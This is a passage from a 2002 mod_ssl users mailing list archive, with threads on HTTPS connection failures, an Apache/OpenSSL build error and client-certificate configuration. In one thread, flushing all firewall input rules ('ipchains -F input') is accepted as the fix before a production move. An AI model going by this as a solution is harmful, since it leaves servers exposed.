	from iris.lab.te.sia.it id EAA05725; Tue, 6 Aug 2002 04:41:49 +0200 (MET DST)
Received: from iris (IDENT:iGZD/5RI3xiZrKIX5yQUKTPovfOpPlPT@localhost.localdomain [127.0.0.1])
	by iris.lab.te.sia.it (8.11.6/8.11.6) with ESMTP id g762fxj15965
	for ; Tue, 6 Aug 2002 02:41:59 GMT
Content-Type: text/plain;
  charset="iso-8859-1"
From: Maurizio Marini 
To: modssl-users@modssl.org
Subject: Re: Problem Connecting via https Over Network and Internet
Date: Tue, 6 Aug 2002 04:41:58 +0200
User-Agent: KMail/1.4.1
References: 
In-Reply-To: 
MIME-Version: 1.0
Message-Id: <200208060441.58198.maumar@datalogica.com>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id EAA05726
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Maurizio Marini 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tuesday 06 August 2002 03:18 am, R. DuFresne wrote:
> I believe they are located under the /etc/initd or /etc/rc directories as
> the firewall is uppped on boot.

/etc/sysconfig/ipchains or /etc/sysconfig/iptables 
-- maumar

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 04:57:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA05952; Tue, 6 Aug 2002 04:56:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id EAA05945; Tue, 6 Aug 2002 04:56:03 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id WAA11986;
	Mon, 5 Aug 2002 22:58:57 -0400
Date: Mon, 5 Aug 2002 22:58:56 -0400 (EDT)
From: "R. DuFresne" 
To: Maurizio Marini 
cc: modssl-users@modssl.org
Subject: Re: Problem Connecting via https Over Network and Internet
In-Reply-To: <200208060441.58198.maumar@datalogica.com>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 6 Aug 2002, Maurizio Marini wrote:

> On Tuesday 06 August 2002 03:18 am, R. DuFresne wrote:
> > I believe they are located under the /etc/initd or /etc/rc directories as
> > the firewall is uppped on boot.
> 
> /etc/sysconfig/ipchains or /etc/sysconfig/iptables 

thanks for the pointer, it's been awhile since I played on a redhat
system, never can keep track of how things are moved about on them boxen
.

Thanks,

Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 05:49:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA07056; Tue, 6 Aug 2002 05:48:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from relais.videotron.ca id FAA07052; Tue, 6 Aug 2002 05:47:27 +0200 (MET DST)
Received: from toilet ([24.202.196.150]) by relais.videotron.ca
          (Videotron-Netscape Messaging Server v4.15 MTA-PRD5) with ESMTP
          id H0EL7102.AOM for ; Mon, 5 Aug 2002
          23:47:25 -0400 
Received: from toilet
	([127.0.0.1] helo=localhost ident=geoff)
	by toilet with esmtp (Exim 3.35 #1 (Debian))
	id 17bvJd-0000Af-00; Mon, 05 Aug 2002 23:47:25 -0400
Date: Mon, 5 Aug 2002 23:47:24 -0400 (EDT)
From: Geoff Thorpe 
X-X-Sender: geoff@toilet.localnet
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.26 with mod_ssl: build failed
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 5 Aug 2002, Cliff Woolley wrote:

> On Mon, 5 Aug 2002, Adrian Hardt wrote:
>
> > /home1/st/h/s-haa5/src/openssl-0.9.6e/libcrypto.a(dso_dlfcn.o): In function `dlfcn_unload':
> > dso_dlfcn.o(.text+0x3a7): undefined reference to `dlclose'
> > collect2: ld returned 1 exit status
> > make[2]: *** [target_static] Error 1
> > make[2]: Leaving directory `/home1/st/h/s-haa5/src/apache_1.3.26/src'
> > make[1]: *** [build-std] Error 2
> > make[1]: Leaving directory `/home1/st/h/s-haa5/src/apache_1.3.26'
> > make: *** [build] Error 2
>
> Hmm... that's interesting.  Try building in mod_so so that libdl will be
> linked in.  Odd that your statically linked openssl library would want
> libdl though... hmph.

Nope, the DSO mechanism in openssl (for loading external engines or
whatever) requires it. If you call ENGINE_load_builtin_engines(), you'll
get a dependancy on DSO code whether it'll be used or not. It normally
doesn't show up because some systems don't need it (BSDs IIRC) and Apache
is usually built with a requirement on SO loading anyway so the linker
extras are already there.

I would have thought the mod_ssl configuration script would deal with this
though - either by grilling the openssl installation in some way, or by
doing its own autoconf-ish test, or at least by forcing the Apache
configuration to do it even if it doesn't want mod_so.

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 10:35:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA13214; Tue, 6 Aug 2002 10:34:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id KAA13209; Tue, 6 Aug 2002 10:34:04 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g768XRg24485
	for ; Tue, 6 Aug 2002 09:33:48 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Tue, 6 Aug 2002 09:33:24 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02067374@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: Problem Connecting via https Over Network and Internet
Date: Tue, 6 Aug 2002 09:33:20 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Easier still, use "setup" on RedHat and select the second option "Firewall
Configuration". This gives you a more user friendly configuration tool. You
can even turn the firewall off this way!

- 
John Airey
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Is the statement 'There is no such thing as truth'  true?


> -----Original Message-----
> From: R. DuFresne [mailto:dufresne@sysinfo.com]
> Sent: 06 August 2002 02:19
> To: Peter Viertel
> Cc: modssl-users@modssl.org
> Subject: Re: Problem Connecting via https Over Network and Internet
> 
> 
> 
> I believe they are located under the /etc/initd or /etc/rc 
> directories as
> the firewall is uppped on boot.  
> 
> Thanks,
> 
> Ron DuFresne
> 
> On Tue, 6 Aug 2002, Peter Viertel wrote:
> 
> > Ah! we have seen this before with redhat - when you install 
> it, you get 
> > the option to configure a firewall with iptables, and maybe 
> it seemed 
> > like a good idea at the time - its got to be the problem - 
> your netstat 
> > shows the LISTEN and some unixes do show 0.0.0.0 instead of 
> the * that 
> > I'm used to on Suns so there *is* something listening but 
> the telnet 
> > shows its not visible from the outside of the network stack...
> > 
> > I'm not a redhat sorta guy, but millions are - anyone else 
> know where 
> > the redhat iptables config files are?
> > 
> > Alicianiah L. Cherry wrote:
> > 
> > >Why would a telnet connection to port 443 be refused?  Any 
> suggestions?
> > >
> > >Thanks,
> > >
> > >Alicia
> > >
> > >-----Original Message-----
> > >From: owner-modssl-users@modssl.org
> > >[mailto:owner-modssl-users@modssl.org]On Behalf Of Cliff Woolley
> > >Sent: Monday, August 05, 2002 6:15 PM
> > >To: modssl-users@modssl.org
> > >Subject: RE: Problem Connecting via https Over Network and Internet
> > >
> > >
> > >On Mon, 5 Aug 2002, Alicianiah L. Cherry wrote:
> > >
> > >  
> > >
> > >>tcp	0  0    0.0.0.0:443    0.0.0.0:*    LISTEN
> > >>
> > >>Seems like port 443 is not listening.
> > >>    
> > >>
> > >
> > >Actually the presence of that line in the netstat output 
> means exactly the
> > >opposite... it *is* listening.  The 0.0.0.0 means it's 
> listening on all
> > >interfaces.  LISTEN tells you that the socket is in the 
> listening state.
> > >
> > >--Cliff
> > >
> > 
> >_____________________________________________________________
> _________
> > >Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> > >User Support Mailing List                      
> modssl-users@modssl.org
> > >Automated List Manager                            
> majordomo@modssl.org
> > 
> >_____________________________________________________________
> _________
> > >Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> > >User Support Mailing List                      
> modssl-users@modssl.org
> > >Automated List Manager                            
> majordomo@modssl.org
> > >  
> > >
> > 
> > 
> > 
> ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> > User Support Mailing List                      
> modssl-users@modssl.org
> > Automated List Manager                            
> majordomo@modssl.org
> > 
> 
> -- 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>         admin & senior security consultant:  sysinfo.com
>                         http://sysinfo.com
> 
> "Cutting the space budget really restores my faith in humanity.  It
> eliminates dreams, goals, and ideals and lets us get straight to the
> business of hate, debauchery, and self-annihilation."
>                 -- Johnny Hart
> 
> testing, only testing, and damn good at it too!
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 12:00:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA14623; Tue, 6 Aug 2002 11:59:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from itahost1.ita.org.mo id LAA14619; Tue, 6 Aug 2002 11:58:57 +0200 (MET DST)
From: EdwardSPL@ita.org.mo
Received: from ita.org.mo (c35line207.dialup1.ctm.net [202.175.52.208])
	by itahost1.ita.org.mo (8.9.3/8.9.3) with ESMTP id RAA00932
	for ; Tue, 6 Aug 2002 17:41:56 +0800
Message-ID: <3D4F9DCE.6F5444C8@ita.org.mo>
Date: Tue, 06 Aug 2002 17:58:38 +0800
X-Mailer: Mozilla 4.7 [en] (WinNT; I)
X-Accept-Language: en,zh-TW
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: apache/php/MySQL/ssl for RH 6.x system
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: EdwardSPL@ita.org.mo
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

Are you using apache 1.3.22, php 4.2.2, openssl 0.9.6e and MySQL 3.23.51
for RH 6.x / 7.x / other system ?
If so, they are good for working together with your system ?

Thank for your suggestion...

Edward.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 13:25:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA16744; Tue, 6 Aug 2002 13:24:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from prospect.stortek.com id NAA16705; Tue, 6 Aug 2002 13:23:35 +0200 (MET DST)
Received: from prospect.stortek.com (localhost [127.0.0.1])
	by prospect.stortek.com (8.12.3/8.12.0) with ESMTP id g76BNTjJ009143
	for ; Tue, 6 Aug 2002 05:23:29 -0600 (MDT)
Received: from vinson-ether1.stortek.com (vinson-ether1.stortek.com [129.80.16.134])
	by prospect.stortek.com (8.12.3/8.12.0) with ESMTP id g76BNTGQ009139
	for ; Tue, 6 Aug 2002 05:23:29 -0600 (MDT)
Received: from [129.80.178.150] ([129.80.178.150])
	by vinson-ether1.stortek.com (8.12.3/8.12.0) with ESMTP id g76BNSjB025779
	for ; Tue, 6 Aug 2002 05:23:28 -0600 (MDT)
Received: from eur-bridge.europe.stortek.com (unverified) by 
 (Content Technologies SMTPRS 4.2.1) with ESMTP id  for ;
 Tue, 6 Aug 2002 12:20:12 +0100
Received: by eur-bridge.europe.stortek.com with Internet Mail Service (5.5.2653.19)
	id ; Tue, 6 Aug 2002 12:23:27 +0100
Message-ID: <2441703C50E90A48AE978E8AC936C0040A0EDA@toumsg01.europe.stortek.com>
From: "Tantaoui, Omar" 
To: "'modssl-users@modssl.org'" 
Subject: Autehticated access / cygwin
Date: Tue, 6 Aug 2002 12:23:48 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C23D3B.BBB0DBD0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tantaoui, Omar" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C23D3B.BBB0DBD0
Content-Type: text/plain;
	charset="iso-8859-1"

Hi,

I'm using Apache + mod_ssl on cygwin platform.

I want to restrict access to authenticated users, so I wrote in httpd.conf:


    SSLEngine on
    SSLCertificateFile conf/ssl.crt/CAWebCert.pem
    SSLCertificateKeyFile conf/ssl.key/CAWebKey.pem
    SSLCACertificatePath conf/ssl.crt
    SSLCACertificateFile conf/ssl.crt/cacert.pem    
    SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown

    
       SSLVerifyClient require
       SSLVerifyDepth 2    
       SSLRequire %{SSL_CLIENT_S_DN_C} eq "FR" and  %{SSL_CLIENT_S_DN_O} eq
"StorageTek" and \
          %{SSL_CLIENT_S_DN_CN} eq "Omar Tantaoui"
    

    ServerAdmin CAAdministrator@storagetek.com
    DocumentRoot "/usr/local/apache/htdocs/ra"
    ServerName tou-ws-sd2138
    ErrorLog logs/raserver-error.log
    CustomLog logs/raserver-access.log common
    ScriptAlias /cgi-bin/ /usr/local/apache/cgi-bin/
 

But i got the following error:
[Tue Aug  6 11:56:39 2002] [error] mod_ssl: Re-negotiation handshake failed:
Not accepted by client!?
[Tue Aug  6 11:56:39 2002] [error] mod_ssl: SSL error on writing data
(OpenSSL library error follows)
[Tue Aug  6 11:56:39 2002] [error] OpenSSL: error:140890C7:SSL
routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a certificate
[Hint: No CAs known to server for verification?]

I don't what does it mean.

What's wrong with my httpd.conf ?

Regards

Omar Tantaoui


------_=_NextPart_001_01C23D3B.BBB0DBD0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






Autehticated access / cygwin




Hi,




I'm using Apache + mod_ssl on cygwin =
platform.




I want to restrict access to =
authenticated users, so I wrote in httpd.conf:




<VirtualHost =
_default_:8082>

    SSLEngine =
on

    SSLCertificateFile =
conf/ssl.crt/CAWebCert.pem

    =
SSLCertificateKeyFile conf/ssl.key/CAWebKey.pem

    =
SSLCACertificatePath conf/ssl.crt

    =
SSLCACertificateFile conf/ssl.crt/cacert.pem    

    SetEnvIf =
User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown




    <Location =
/>

       =
SSLVerifyClient require

       =
SSLVerifyDepth 2    

       =
SSLRequire %{SSL_CLIENT_S_DN_C} eq "FR" and  =
%{SSL_CLIENT_S_DN_O} eq "StorageTek" and \

          =
%{SSL_CLIENT_S_DN_CN} eq "Omar Tantaoui"

    =
</Location>




    ServerAdmin =
CAAdministrator@storagetek.com

    DocumentRoot =
"/usr/local/apache/htdocs/ra"

    ServerName =
tou-ws-sd2138

    ErrorLog =
logs/raserver-error.log

    CustomLog =
logs/raserver-access.log common

    ScriptAlias =
/cgi-bin/ /usr/local/apache/cgi-bin/

</VirtualHost> 




But i got the following error:

[Tue Aug  6 11:56:39 2002] =
[error] mod_ssl: Re-negotiation handshake failed: Not accepted by =
client!?

[Tue Aug  6 11:56:39 2002] =
[error] mod_ssl: SSL error on writing data (OpenSSL library error =
follows)

[Tue Aug  6 11:56:39 2002] =
[error] OpenSSL: error:140890C7:SSL =
routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a certificate =
[Hint: No CAs known to server for verification?]



I don't what does it mean.




What's wrong with my httpd.conf =
?




Regards




Omar Tantaoui





------_=_NextPart_001_01C23D3B.BBB0DBD0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 14:42:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA18712; Tue, 6 Aug 2002 14:41:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from schoollink.net id OAA18707; Tue, 6 Aug 2002 14:41:06 +0200 (MET DST)
Received: from [172.16.1.15] (HELO Tupper)
  by schoollink.net (CommuniGate Pro SMTP 3.5.9)
  with SMTP id 25593267 for modssl-users@modssl.org; Tue, 06 Aug 2002 08:34:33 -0400
Received: by localhost with Microsoft MAPI; Tue, 6 Aug 2002 08:38:51 -0400
Message-ID: <01C23D24.B09EA860.cherryal@riverstone.halifaxnc.com>
From: Alicianiah Cherry 
To: "'modssl-users@modssl.org'" 
Subject: RE: Problem Connecting via https Over Network and Internet - SOLVED - Firewall Issue
Date: Tue, 6 Aug 2002 08:38:49 -0400
Organization: RiverStone Counseling and Personal Development
X-Mailer: Microsoft Internet E-mail/MAPI - 8.0.0.4211
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alicianiah Cherry 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Just goes to show my inexperience with Linux - issuing the ipchains -F 
input command cleared the firewall rules and now SSL connections work 
GREAT!  Thanks to you all for your time and many responses.  I will be 
quite busy today as I am moving a web app off a Win2K box and on to Linux - 
the SSL problem was the only thing holding me up.  Apache seems to handle 
SSL connections much faster than IIS.

Any help or suggestions you might offer in terms of advice on selecting a 
CA, as well as recommended upgrades for Apache or mod_ssl would be greatly 
appreciated. THANKS AGAIN!

Alicia Cherry
Systems Administrator
RiverStone Counseling

-----Original Message-----
From:	Maurizio Marini [SMTP:maumar@datalogica.com]
Sent:	Monday, August 05, 2002 10:37 PM
To:	modssl-users@modssl.org
Subject:	Re: Problem Connecting via https Over Network and Internet

> negating a firewall issue, I would think.

why do u thik this? have you tried to clear your firewall rules, before to 
say
this? if not, do it issuing as root: # ipchains -F input
by default RedHat 7.3 install ipchains
in any case, send us output of  ipchains -L -n (or the output of iptables 
-L
-n if u have configured iptables in your box)


-- maumar

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 15:34:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA19767; Tue, 6 Aug 2002 15:33:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id PAA19763; Tue, 6 Aug 2002 15:32:15 +0200 (MET DST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0a.swx.com (8.9.3+Sun/8.9.3) with ESMTP id PAA11649
	for ; Tue, 6 Aug 2002 15:32:04 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id PAA12678
	for ; Tue, 6 Aug 2002 15:32:04 +0200 (MEST)
X-Authentication-Warning: gate0b.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C23D4D.A6DBFDE4"
Subject: RE: Autehticated access / cygwin
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Tue, 6 Aug 2002 15:32:04 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA926A@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: Autehticated access / cygwin
Thread-Index: AcI9PCDaMFM779upRWCX6++wIz3DZAAERfgw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C23D4D.A6DBFDE4
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

The problem is all in the error messages.. You are requesting that =
clients provide a certificate (SSLVerifyClient require) but then they do =
not do so (peer did not return a certificate) do you really want the =
clients all to have certs?
=20
Rgds,
=20
Owen Boyle
=20
=20
 -----Original Message-----
From: Tantaoui, Omar [mailto:TantaO@europe.stortek.com]
Sent: Dienstag, 6. August 2002 13:24
To: 'modssl-users@modssl.org'
Subject: Autehticated access / cygwin



Hi,=20

I'm using Apache + mod_ssl on cygwin platform.=20

I want to restrict access to authenticated users, so I wrote in =
httpd.conf:=20

=20
    SSLEngine on=20
    SSLCertificateFile conf/ssl.crt/CAWebCert.pem=20
    SSLCertificateKeyFile conf/ssl.key/CAWebKey.pem=20
    SSLCACertificatePath conf/ssl.crt=20
    SSLCACertificateFile conf/ssl.crt/cacert.pem   =20
    SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown=20

    =20
       SSLVerifyClient require=20
       SSLVerifyDepth 2   =20
       SSLRequire %{SSL_CLIENT_S_DN_C} eq "FR" and  %{SSL_CLIENT_S_DN_O} =
eq "StorageTek" and \=20
          %{SSL_CLIENT_S_DN_CN} eq "Omar Tantaoui"=20
    =20

    ServerAdmin CAAdministrator@storagetek.com=20
    DocumentRoot "/usr/local/apache/htdocs/ra"=20
    ServerName tou-ws-sd2138=20
    ErrorLog logs/raserver-error.log=20
    CustomLog logs/raserver-access.log common=20
    ScriptAlias /cgi-bin/ /usr/local/apache/cgi-bin/=20
=20

But i got the following error:=20
[Tue Aug  6 11:56:39 2002] [error] mod_ssl: Re-negotiation handshake =
failed: Not accepted by client!?=20
[Tue Aug  6 11:56:39 2002] [error] mod_ssl: SSL error on writing data =
(OpenSSL library error follows)=20
[Tue Aug  6 11:56:39 2002] [error] OpenSSL: error:140890C7:SSL =
routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a certificate =
[Hint: No CAs known to server for verification?]

I don't what does it mean.=20

What's wrong with my httpd.conf ?=20

Regards=20

Omar Tantaoui=20


------_=_NextPart_001_01C23D4D.A6DBFDE4
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable




Autehticated access / cygwin




The=20
problem is all in the error messages.. You are requesting that clients =
provide a=20
certificate (SSLVerifyClient require) but =
then they=20
do not do so (peer did not return a =
certificate) do=20
you really want the clients all to have certs?


 


Rgds,


 


Owen=20
Boyle


 


 


 -----Original =
Message-----
From:=20
Tantaoui, Omar [mailto:TantaO@europe.stortek.com]
Sent: =
Dienstag, 6.=20
August 2002 13:24
To: =
'modssl-users@modssl.org'
Subject:=20
Autehticated access / cygwin




  
Hi, 

  
I'm using Apache + mod_ssl on cygwin=20
  platform. 

  
I want to restrict access to =
authenticated users,=20
  so I wrote in httpd.conf: 

  
<VirtualHost =
_default_:8082> 
    SSLEngine on 
    SSLCertificateFile =
conf/ssl.crt/CAWebCert.pem=20
  
    =
SSLCertificateKeyFile=20
  conf/ssl.key/CAWebKey.pem 
    SSLCACertificatePath conf/ssl.crt =

    SSLCACertificateFile=20
  conf/ssl.crt/cacert.pem    
    SetEnvIf User-Agent ".*MSIE.*" nokeepalive =

  ssl-unclean-shutdown 

  
    <Location =
/>=20
  
      =20
  SSLVerifyClient require 
       SSLVerifyDepth =
2   =20
  
      =20
  SSLRequire %{SSL_CLIENT_S_DN_C} eq "FR" and  %{SSL_CLIENT_S_DN_O} =
eq=20
  "StorageTek" and \ 
         =20
  %{SSL_CLIENT_S_DN_CN} eq "Omar Tantaoui" 
    </Location> 

  
    ServerAdmin=20
  CAAdministrator@storagetek.com 
    DocumentRoot =
"/usr/local/apache/htdocs/ra"=20
  
    ServerName =
tou-ws-sd2138=20
  
    ErrorLog=20
  logs/raserver-error.log 
   =20
  CustomLog logs/raserver-access.log common 
    ScriptAlias /cgi-bin/=20
  /usr/local/apache/cgi-bin/ 
</VirtualHost> 

  
But i got the following error: =

[Tue Aug  6 11:56:39 2002] [error] mod_ssl: =

  Re-negotiation handshake failed: Not accepted by client!? =

[Tue Aug  6 11:56:39 2002] [error] mod_ssl: =
SSL error=20
  on writing data (OpenSSL library error follows) 
[Tue Aug  6 11:56:39 2002] [error] OpenSSL: =
error:140890C7:SSL=20
  routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a certificate =
[Hint:=20
  No CAs known to server for verification?]

  
I don't what does it mean. 

  
What's wrong with my httpd.conf =
? 

  
Regards 

  
Omar Tantaoui =



------_=_NextPart_001_01C23D4D.A6DBFDE4--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 15:48:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA20011; Tue, 6 Aug 2002 15:47:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from prospect.stortek.com id PAA20004; Tue, 6 Aug 2002 15:47:07 +0200 (MET DST)
Received: from prospect.stortek.com (localhost [127.0.0.1])
	by prospect.stortek.com (8.12.3/8.12.0) with ESMTP id g76DkxjJ019799
	for ; Tue, 6 Aug 2002 07:47:00 -0600 (MDT)
Received: from vinson-ether1.stortek.com (vinson-ether1.stortek.com [129.80.16.134])
	by prospect.stortek.com (8.12.3/8.12.0) with ESMTP id g76DkxGQ019792
	for ; Tue, 6 Aug 2002 07:46:59 -0600 (MDT)
Received: from [129.80.178.150] ([129.80.178.150])
	by vinson-ether1.stortek.com (8.12.3/8.12.0) with ESMTP id g76DdSjB020808
	for ; Tue, 6 Aug 2002 07:39:29 -0600 (MDT)
Received: from eur-bridge.europe.stortek.com (unverified) by 
 (Content Technologies SMTPRS 4.2.1) with ESMTP id  for ;
 Tue, 6 Aug 2002 14:36:12 +0100
Received: by eur-bridge.europe.stortek.com with Internet Mail Service (5.5.2653.19)
	id ; Tue, 6 Aug 2002 14:39:27 +0100
Message-ID: <2441703C50E90A48AE978E8AC936C0040A0EDE@toumsg01.europe.stortek.com>
From: "Tantaoui, Omar" 
To: "'modssl-users@modssl.org'" 
Subject: RE: Autehticated access / cygwin
Date: Tue, 6 Aug 2002 14:39:42 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
